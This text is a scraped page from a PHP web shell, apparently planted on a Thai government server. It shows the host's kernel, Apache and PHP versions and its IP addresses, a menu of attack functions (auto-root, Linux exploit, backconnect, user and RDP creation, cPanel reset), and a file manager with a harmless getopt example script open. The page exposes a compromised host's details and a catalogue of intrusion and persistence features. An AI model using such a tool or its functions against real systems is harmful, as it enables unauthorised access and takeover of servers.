Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
util-linux-ng-2.17.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
8.03
KB
-rw-r--r--
COPYING.GPL
17.56
KB
-rw-r--r--
COPYING.UCB
1.78
KB
-rw-r--r--
NEWS
63.36
KB
-rw-r--r--
README
2.8
KB
-rw-r--r--
README.cal
2.21
KB
-rw-r--r--
README.cfdisk
1.72
KB
-rw-r--r--
README.clear
196
B
-rw-r--r--
README.col
2.15
KB
-rw-r--r--
README.ddate
4.22
KB
-rw-r--r--
README.devel
4.1
KB
-rw-r--r--
README.fdisk
26.47
KB
-rw-r--r--
README.floppy
3.45
KB
-rw-r--r--
README.flushb
188
B
-rw-r--r--
README.getty
1.01
KB
-rw-r--r--
README.hwclock
1.17
KB
-rw-r--r--
README.licensing
617
B
-rw-r--r--
README.modems-with-agetty
2.56
KB
-rw-r--r--
README.mount
318
B
-rw-r--r--
README.namei
989
B
-rw-r--r--
README.namei2
599
B
-rw-r--r--
README.poeigl
22.3
KB
-rw-r--r--
getopt-parse.bash
1.46
KB
-rw-r--r--
getopt-parse.tcsh
2.2
KB
-rw-r--r--
getopt-test.bash
122
B
-rw-r--r--
getopt-test.tcsh
120
B
-rw-r--r--
sfdisk.examples
10.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getopt-parse.bash
#!/bin/bash # A small example program for using the new getopt(1) program. # This program will only work with bash(1) # An similar program using the tcsh(1) script language can be found # as parse.tcsh # Example input and output (from the bash prompt): # ./parse.bash -a par1 'another arg' --c-long 'wow!*\?' -cmore -b " very long " # Option a # Option c, no argument # Option c, argument `more' # Option b, argument ` very long ' # Remaining arguments: # --> `par1' # --> `another arg' # --> `wow!*\?' # Note that we use `"$@"' to let each command-line parameter expand to a # separate word. The quotes around `$@' are essential! # We need TEMP as the `eval set --' would nuke the return value of getopt. TEMP=`getopt -o ab:c:: --long a-long,b-long:,c-long:: \ -n 'example.bash' -- "$@"` if [ $? != 0 ] ; then echo "Terminating..." >&2 ; exit 1 ; fi # Note the quotes around `$TEMP': they are essential! eval set -- "$TEMP" while true ; do case "$1" in -a|--a-long) echo "Option a" ; shift ;; -b|--b-long) echo "Option b, argument \`$2'" ; shift 2 ;; -c|--c-long) # c has an optional argument. As we are in quoted mode, # an empty parameter will be generated if its optional # argument is not found. case "$2" in "") echo "Option c, no argument"; shift 2 ;; *) echo "Option c, argument \`$2'" ; shift 2 ;; esac ;; --) shift ; break ;; *) echo "Internal error!" ; exit 1 ;; esac done echo "Remaining arguments:" for arg do echo '--> '"\`$arg'" ; done
Close